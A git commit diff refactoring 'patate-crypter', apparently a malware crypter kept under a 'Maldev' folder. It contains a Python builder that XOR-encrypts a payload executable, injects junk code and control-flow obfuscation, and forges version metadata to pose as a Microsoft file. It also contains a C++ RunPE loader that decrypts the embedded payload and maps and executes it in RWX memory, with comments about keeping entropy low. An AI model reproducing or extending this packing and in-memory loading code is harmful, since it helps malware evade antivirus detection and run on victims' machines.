fix: file structure, made a bit of refactor

.gitignore

@@ -2,7 +2,8 @@
 *.dll
 .vs
 __pycache__
-Debug
-Release
+bin
+build
 sample.h
-icon.ico
+icon.ico
+settings.txt

Builder/gui.py

@@ -142,7 +142,7 @@ class Ui_mainWindow(object):
     
     def generate(self) :
         in_filename = self.filepath
-        out_filename = self.pushButton.text().split(".")[0] + "_out.exe"
+        out_filename = "../bin/" + self.pushButton.text().split(".")[0] + "_out.exe"
         xor_key = ''
 
         if self.xor :
@@ -160,7 +160,7 @@ class Ui_mainWindow(object):
         
         print(f"Filename : {in_filename}")
         file = bytearray(open(in_filename, 'rb').read())
-        with open("sample.h", 'w') as output:
+        with open("../Crypter/sample.h", 'w') as output:
             output.write("unsigned char sample[] = { ")
             for count, byte in enumerate(file, 1):
                 if xor_key :
@@ -176,10 +176,10 @@ class Ui_mainWindow(object):
         QCoreApplication.processEvents()
         
         # Working with a copy of main.cpp
-        os.rename("main.cpp", "DO_NOT_TOUCH.cpp")
-        shutil.copyfile('DO_NOT_TOUCH.cpp', 'main.cpp')
+        os.rename("../Crypter/main.cpp", "../Crypter/DO_NOT_TOUCH.cpp")
+        shutil.copyfile('../Crypter/DO_NOT_TOUCH.cpp', '../Crypter/main.cpp')
         
-        with open("config.h", "w") as c :
+        with open("../Crypter/config.h", "w") as c :
             c.write(f'#pragma once\n#define KEY "{xor_key}"')
         
         self.label_2.setText("Adding junk code...")
@@ -201,15 +201,15 @@ class Ui_mainWindow(object):
         vs_path = os.popen("\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\" -nologo -latest -property installationPath").read().replace("\n","") #https://stackoverflow.com/questions/46223916/msbuild-exe-not-found-cmd-exe
         cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe"
         
-        return_code = os.system("\""+cmd_line+"\" . /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+"  /t:Rebuild")
+        return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+"  /t:Rebuild")
         
         if return_code :
             self.label_2.setText("build failed.")
             QCoreApplication.processEvents()
 
         # Cleaning up..
-        os.remove("main.cpp")
-        os.rename("DO_NOT_TOUCH.cpp", "main.cpp")
+        os.remove("../Crypter/main.cpp")
+        os.rename("../Crypter/DO_NOT_TOUCH.cpp", "../Crypter/main.cpp")
         
         # Find all BMP files in the directory with a wildcard pattern
         bmp_files = glob.glob(os.path.join(".", "*.bmp"))

Builder/metadata.py

@@ -26,11 +26,11 @@ def generate_bmp(filename):
         
 def change_metadata(icon_file) :
     number_of_bmp = 0#GetRandomRange(2, 6) makes the entropy go to 7.4 for ONE image, so very very very bad
-    f = open("DllExecutor.rc", "r")
+    f = open("../Crypter/patate-crypter.rc", "r")
     f_c = f.readlines()
     f.close()
  
-    o = open("DllExecutor.rc", "w")
+    o = open("../Crypter/patate-crypter.rc", "w")
     for line in f_c :
         if "CompanyName" in line :
             line = f'\t\t\tVALUE "CompanyName", "Microsoft"\n'

Builder/obfuscation.py

@@ -148,7 +148,7 @@ def GetRandomControlFlow():
 
     return cpp_code
 
-FILES_TO_OBFUSCATE = {"main.cpp":"DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"}
+FILES_TO_OBFUSCATE = {"../Crypter/main.cpp":"../Crypter/DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"}
 def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
     if PASS < CFLOW_PASS : PASS = CFLOW_PASS
     
@@ -301,7 +301,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
     #include <Prsht.h>\r\n
     #include <Userenv.h>\r\n"""
         
-        if outfile == "main.cpp" :
+        if outfile == "../Crypter/main.cpp" :
             out.insert(0, fake_api)
             out.insert(0, static_imports)
             out.insert(0, fake_libs)

Builder/randomness.py

@@ -11,24 +11,20 @@ def GetRandomNumber() :
 
 def GetRandomRange(a, b):
     if a > b:
-        a, b = b, a  # Swap a and b if a is greater than b
+        a, b = b, a
 
-    range_size = b - a + 1  # Calculate the size of the range
+    range_size = b - a + 1
 
-    # Calculate the number of bits required to represent all values in the range
     num_bits = 0
     while 2 ** num_bits < range_size:
         num_bits += 1
 
-    # Generate a random number in binary representation using GetRandomBool()
     random_binary = [GetRandomBool() for _ in range(num_bits)]
 
-    # Convert the binary representation to an integer within the specified range
     random_integer = 0
     for i, bit in enumerate(random_binary):
         random_integer += bit * (2 ** i)
 
-    # Map the generated integer to the desired range [a, b]
     mapped_value = a + random_integer
     if mapped_value > b : return GetRandomRange(a, b)
     

Builder/requirements.txt

@@ -0,0 +1,2 @@
+pillow
+pywin32

Crypter/config.h

@@ -0,0 +1,2 @@
+#pragma once
+#define KEY ""

Crypter/main.cpp

@@ -55,41 +55,30 @@ void decrypt(const char* key, int offset = 0, int limit = -1) {
 HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
 {
 	//START
-    // Check if the DLL buffer is at least as large as the size of the DOS header.
     if (dll_size < sizeof(IMAGE_DOS_HEADER)) {
         return NULL;
     }
 
 	decrypt(KEY, 0, 1024); // decrypt only the header
 	
-    // Get a pointer to the DOS header.
     const IMAGE_DOS_HEADER* dos_header = static_cast<const IMAGE_DOS_HEADER*>(dll_buffer);
 
-    // Check if the DLL buffer is at least as large as the size of the NT headers.
     if (dll_size < dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS)) {
         return NULL;
     }
 
-    // Get a pointer to the NT headers.
     const IMAGE_NT_HEADERS* nt_headers = reinterpret_cast<const IMAGE_NT_HEADERS*>(static_cast<const char*>(dll_buffer) + dos_header->e_lfanew);
-
-    // Check if the DLL is a valid 32-bit or 64-bit PE file.
     if (nt_headers->Signature != IMAGE_NT_SIGNATURE) {
         return NULL;
     }
 
-    // Calculate the size of the image.
     const size_t image_size = nt_headers->OptionalHeader.SizeOfImage;
-
-    // Allocate memory for the DLL in the current process.
     void* image_base = VirtualAlloc((LPVOID)newBase, image_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
     if (image_base == NULL) {
         return NULL;
     }
 
-    // Get a pointer to the section headers.
     const IMAGE_SECTION_HEADER* section_headers = reinterpret_cast<const IMAGE_SECTION_HEADER*>(nt_headers + 1);
-
     // Copy the section data to the allocated memory.
     for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
         const IMAGE_SECTION_HEADER* section_header = section_headers + i;
@@ -100,7 +89,6 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
     
     DEBUG_PRINTF("[+] Wrote section data\n");
 
-    //Rebasing symbols
     DEBUG_PRINTF("[+] Rebasing Dll\n");
     HMODULE dll_handle = static_cast<HMODULE>(image_base);
 
@@ -110,46 +98,34 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
 
     // Get the address of the DLL's import directory.
     const IMAGE_IMPORT_DESCRIPTOR* import_directory = reinterpret_cast<const IMAGE_IMPORT_DESCRIPTOR*>(static_cast<const char*>(image_base) + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
-
     DEBUG_PRINTF("[+] Fixing imports\n");
-    // Iterate through the import directory and resolve the imported functions.
+
     while (import_directory->Name != 0) {
-        // Get the name of the imported DLL.
         const char* import_dll_name = static_cast<const char*>(image_base) + import_directory->Name;
 
-        // Load the imported DLL.
         HMODULE import_dll = LoadLibraryA(import_dll_name);
         if (import_dll == NULL) {
             VirtualFree(image_base, 0, MEM_RELEASE);
             return NULL;
         }
 
-        // Get the address of the imported functions.
         IMAGE_THUNK_DATA* import_thunk_data = reinterpret_cast<IMAGE_THUNK_DATA*>(static_cast<char*>(image_base) + import_directory->FirstThunk);
 
-        // Resolve the imported functions.
 		while (import_thunk_data->u1.AddressOfData != 0) {
-			// Check if the import is by ordinal
 			if (IMAGE_SNAP_BY_ORDINAL(import_thunk_data->u1.Ordinal)) {
-				// Get the ordinal value
 				DWORD ordinal = IMAGE_ORDINAL(import_thunk_data->u1.Ordinal);
 
-				// Get the address of the imported function by ordinal
 				void* import_address = GetProcAddress(import_dll, reinterpret_cast<LPCSTR>(ordinal));
 
-				// Write the address of the imported function to the IAT.
 				if (import_address != nullptr) {
 					*reinterpret_cast<void**>(import_thunk_data) = import_address;
 				}
 			}
 			else {
-				// Get the import by name
 				const IMAGE_IMPORT_BY_NAME* import_by_name = reinterpret_cast<const IMAGE_IMPORT_BY_NAME*>(static_cast<const char*>(image_base) + import_thunk_data->u1.AddressOfData);
 
-				// Get the address of the imported function by name
 				void* import_address = GetProcAddress(import_dll, reinterpret_cast<const char*>(import_by_name->Name));
 
-				// Write the address of the imported function to the IAT.
 				if (import_address != nullptr) {
 					*reinterpret_cast<void**>(import_thunk_data) = import_address;
 				}
@@ -163,58 +139,40 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
 
     DEBUG_PRINTF("[+] Doing relocation\n");
 
-    // Get the address of the DLL's base relocation directory.
     const IMAGE_BASE_RELOCATION* base_relocation = reinterpret_cast<const IMAGE_BASE_RELOCATION*>(static_cast<const char*>(image_base) + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
-
-    // Calculate the delta between the original base address and the new base address.
     DWORD delta = newBase - nt_headers->OptionalHeader.ImageBase;
 
-    // Iterate through the base relocation directory and apply the relocations.
     while (base_relocation->VirtualAddress != 0) {
-        // Get the relocation block header.
         const WORD* relocation_block = reinterpret_cast<const WORD*>(base_relocation + 1);
 
-        // Calculate the number of relocations in the current block.
         DWORD num_relocations = (base_relocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
 
-        // Apply each relocation in the current block.
         for (DWORD i = 0; i < num_relocations; ++i) {
-            // Get the current relocation entry.
             WORD relocation_entry = relocation_block[i];
 
-            // Extract the type and offset from the relocation entry.
             WORD type = relocation_entry >> 12;
             WORD offset = relocation_entry & 0xFFF;
 
-            // Get a pointer to the address to be relocated.
             DWORD* reloc_address = reinterpret_cast<DWORD*>(static_cast<char*>(image_base) + base_relocation->VirtualAddress + offset);
 
-            // Apply the relocation based on the type.
             switch (type) {
             case IMAGE_REL_BASED_ABSOLUTE:
-                // The relocation is skipped if the type is absolute.
                 break;
 
             case IMAGE_REL_BASED_HIGHLOW:
-                // Adjust the address by adding the delta.
                 *reloc_address += delta;
                 break;
 
             default:
-                // Handle other relocation types if necessary.
-                // ...
                 break;
             }
         }
 
-        // Move to the next relocation block.
         base_relocation = reinterpret_cast<const IMAGE_BASE_RELOCATION*>(reinterpret_cast<const char*>(base_relocation) + base_relocation->SizeOfBlock);
     }
 
     DEBUG_PRINTF("\n[+] Calling DllMain\n");
-    // Call the DLL's entry point, if it has one.
     if (entry_point != NULL) {
-        // Get the address of the DLL's entry point in the IAT.
         void* entry_point_iat = static_cast<char*>(image_base) + nt_headers->OptionalHeader.AddressOfEntryPoint;
 
         // Cleaning
@@ -255,7 +213,6 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR     lpCm
 
     DEBUG_PRINTF("[+] Started\n");
 
-    // Load the DLL from a buffer in memory
     const int bufferSize = sizeof(sample) / sizeof(sample[0]);
 	
     HMODULE dll = RunPE(sample, bufferSize, NEW_ADDRESS);
@@ -264,7 +221,6 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR     lpCm
         return 1;
     }
 
-    // Free the DLL
     ::FreeLibrary(dll);
 
     return 0;

Crypter/patate-crypter.rc

@@ -68,12 +68,12 @@ BEGIN
         BLOCK "040c04b0"
         BEGIN
 			VALUE "CompanyName", "Microsoft"
-			VALUE "FileDescription", "sblujwzduxlhnhmiyiri"
+			VALUE "FileDescription", "qhffltbhaqzfykugipsz"
 			VALUE "FileVersion", "1.0.0.1"
-			VALUE "InternalName", "tkedqel.exe"
+			VALUE "InternalName", "gqhfyim.exe"
 			VALUE "LegalCopyright", "Copyright (C) 2023"
-			VALUE "OriginalFilename", "lgeagvp.exe"
-			VALUE "ProductName", "aejcvay.exe"
+			VALUE "OriginalFilename", "ddyshnw.exe"
+			VALUE "ProductName", "swtvick.exe"
             VALUE "ProductVersion", "1.0.0.1"
         END
     END
@@ -83,7 +83,7 @@ BEGIN
     END
 END
 
-MAINICON ICON "C:/Users/patate/Desktop/Programmation/C++/Low-Level/RunPE/icon.ico"
+MAINICON ICON "C:/Users/patate/Desktop/Programmation/C++/Maldev/patate-crypter/icon.ico"
 #endif
 /////////////////////////////////////////////////////////////////////////////
 

Crypter/patate-crypter.vcxproj

@@ -22,7 +22,7 @@
     <VCProjectVersion>16.0</VCProjectVersion>
     <Keyword>Win32Proj</Keyword>
     <ProjectGuid>{f2b3a240-e4b5-428f-991a-765881b2e877}</ProjectGuid>
-    <RootNamespace>DllExecutor</RootNamespace>
+    <RootNamespace>patate-crypter</RootNamespace>
     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
@@ -72,15 +72,23 @@
   <PropertyGroup Label="UserMacros" />
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <LinkIncremental>true</LinkIncremental>
+    <OutDir>$(ProjectDir)..\bin\</OutDir>
+    <IntDir>$(ProjectDir)build\</IntDir>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(ProjectDir)..\bin\</OutDir>
+    <IntDir>$(ProjectDir)build\</IntDir>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     <LinkIncremental>true</LinkIncremental>
+    <OutDir>$(ProjectDir)..\bin\</OutDir>
+    <IntDir>$(ProjectDir)build\</IntDir>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(ProjectDir)..\bin\</OutDir>
+    <IntDir>$(ProjectDir)build\</IntDir>
   </PropertyGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <ClCompile>
@@ -109,7 +117,7 @@
       <Optimization>Disabled</Optimization>
       <WholeProgramOptimization>false</WholeProgramOptimization>
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
-      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
     </ClCompile>
     <Link>
       <SubSystem>Windows</SubSystem>
@@ -162,7 +170,7 @@
     <ClInclude Include="sample.h" />
   </ItemGroup>
   <ItemGroup>
-    <ResourceCompile Include="DllExecutor.rc" />
+    <ResourceCompile Include="patate-crypter.rc" />
   </ItemGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
   <ImportGroup Label="ExtensionTargets">

Crypter/patate-crypter.vcxproj.filters

@@ -20,18 +20,18 @@
     </ClCompile>
   </ItemGroup>
   <ItemGroup>
-    <ClInclude Include="sample.h">
-      <Filter>Fichiers d%27en-tête</Filter>
-    </ClInclude>
     <ClInclude Include="config.h">
       <Filter>Fichiers d%27en-tête</Filter>
     </ClInclude>
     <ClInclude Include="resource.h">
       <Filter>Fichiers d%27en-tête</Filter>
     </ClInclude>
+    <ClInclude Include="sample.h">
+      <Filter>Fichiers d%27en-tête</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
-    <ResourceCompile Include="DllExecutor.rc">
+    <ResourceCompile Include="patate-crypter.rc">
       <Filter>Fichiers de ressources</Filter>
     </ResourceCompile>
   </ItemGroup>

Crypter/patate-crypter.vcxproj.user

@@ -1,4 +1,6 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <PropertyGroup />
+  <PropertyGroup>
+    <ShowAllFiles>true</ShowAllFiles>
+  </PropertyGroup>
 </Project>

README.md

@@ -34,5 +34,6 @@ With obfuscation (only showing a few nodes, the original graph was more than 40K
 
 # How to run
 ```
+cd Builder
 python gui.py
 ```

config.h

@@ -1,2 +0,0 @@
-#pragma once
-#define KEY "ugifthdrdgrd"

patate-crypter.sln

@@ -3,7 +3,7 @@ Microsoft Visual Studio Solution File, Format Version 12.00
 # Visual Studio Version 17
 VisualStudioVersion = 17.1.32407.343
 MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DllExecutor", "DllExecutor.vcxproj", "{F2B3A240-E4B5-428F-991A-765881B2E877}"
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "patate-crypter", "Crypter/patate-crypter.vcxproj", "{F2B3A240-E4B5-428F-991A-765881B2E877}"
 EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution

requirements.txt

@@ -1,3 +0,0 @@
-OpenSSL
-pillow
-pywin32==302